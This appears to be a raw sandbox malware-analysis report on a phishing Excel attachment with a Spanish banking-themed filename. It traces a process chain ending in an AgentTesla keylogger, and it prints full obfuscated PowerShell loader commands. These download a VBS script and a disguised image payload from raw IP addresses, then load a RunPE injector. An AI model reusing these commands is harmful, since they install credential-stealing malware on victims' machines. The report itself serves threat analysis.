                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE89AB352E7_2_000007FE89AB352E
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_000007FE89A92E0E12_2_000007FE89A92E0E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_003D38E814_2_003D38E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_003D490814_2_003D4908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_003DF32014_2_003DF320
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_003DBB5814_2_003DBB58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_003D3C3014_2_003D3C30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_00721D6014_2_00721D60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_007205C014_2_007205C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0072167814_2_00721678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 14_2_0072466814_2_00724668
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxOLE indicator, VBA macros: true
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxStream path 'MBD000391C9/\x1Ole' : http://hop.fyi/ppltLB*Cqr?X"8PPIkjg4Ek1F5rA7P42cghgp3fT589hzutfsF4YjrzoqFeNU0xQEF2AceU3I83Ap5l3AF4yxswPqu5CaXHsEDb2y8aBCZAqxVu6OwTDYw063g4mSQ8l91lMSwHSXyVIfos1X7CUXLtZD$qh?aG*3
                    Source: 46930000.0.drStream path 'MBD000391C9/\x1Ole' : http://hop.fyi/ppltLB*Cqr?X"8PPIkjg4Ek1F5rA7P42cghgp3fT589hzutfsF4YjrzoqFeNU0xQEF2AceU3I83Ap5l3AF4yxswPqu5CaXHsEDb2y8aBCZAqxVu6OwTDYw063g4mSQ8l91lMSwHSXyVIfos1X7CUXLtZD$qh?aG*3
                    Source: ~DF9497146B9A365AE9.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 12.2.powershell.exe.12778558.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 12.2.powershell.exe.12778558.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Process Memory Space: powershell.exe PID: 3324, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 12.2.powershell.exe.12778558.2.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLSX@16/24@4/5
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7C5F.tmpJump to behavior
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxOLE indicator, Workbook stream: true
                    Source: 46930000.0.drOLE indicator, Workbook stream: true
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................o.......o.....}..w..............D.......D......1D.....(.P.......D......3D.......................c.............Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w......c.....\.F.......D.............(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................c.....}..w............./V.....7..l......U.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w......c.....\.F.......D.............(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................c.....}..w............./V.....7..l......U.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....X.......N.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1../V.....7..l......U.....(.P.....................X....... .......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................c.....}..w............./V.....7..l......U.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.................X.......@.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................c.....}..w............./V.....7..l......U.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...X.......N.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..........................................c.....}..w............./V.....7..l......U.....(.P.............................l.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .........c.....}..w............./V.....7..l......U.....(.P.....................X...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................c.............0...^....Wn.....}..w............@EE.....^...............(.P.....................x...............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................c.................^....Wn.....}..w............@EE.....^...............(.P.....................x...............................Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsxReversingLabs: Detection: 18%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2C3.tmp" "c:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" Jump to behavior
